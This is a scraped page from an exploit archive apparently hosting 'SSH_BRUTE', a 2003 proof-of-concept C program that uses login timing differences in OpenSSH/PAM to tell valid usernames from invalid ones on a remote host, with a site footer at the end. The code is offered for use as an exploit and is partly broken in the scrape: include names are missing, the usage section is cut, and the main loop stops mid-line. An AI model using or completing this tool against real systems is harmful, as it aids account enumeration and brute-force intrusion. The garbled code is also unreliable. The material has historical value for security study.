OpenSSH/PAM

    
 
     * Version ZIP (ssh_brute.c + openssh-3.6.1p1_brute.diff) *
/*
                              * SSH_BRUTE - OpenSSH/PAM 
                              * Proof of concept code by Maurizio Agazzini 
                              *
                              * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
                              *
                              * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
                              *
                              * $ tar xvfz openssh-3.6.1p1.tar.gz
                              * $ patch -p0 
                              #include 
                              #include 

                              /* an illegal user */
                              #define NO_USER "not_val_user"

                              /* path of the patched ssh */
                              #define PATH_SSH "./ssh"

                              /* max time range for invalid user */
                              #define TIME_RANGE 3 

                              int main(int argc, char *argv[])
                              {
                              FILE * in;
                              char buffer[2000], username[100], *host;
                              int time_non_valid = 0, time_user = 0; 
                              int version = 1, i = 0, ret;

                              fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM   \n\n", argv[0]);
                              exit(-1);
                              }

                              version = atoi(argv[1]);
                              host = argv[3];

                              if ( ( in = fopen(argv[2], "r") ) == NULL ) {
                              fprintf(stderr, "\n Can't open %s\n", argv[2]);
                              exit(-1);
                              }

                              /* test an illegal user */
                              printf("\n Testing an illegal user\t: ");
                              fflush(stdout);

                              sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);

                              for (i = 0; i 

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits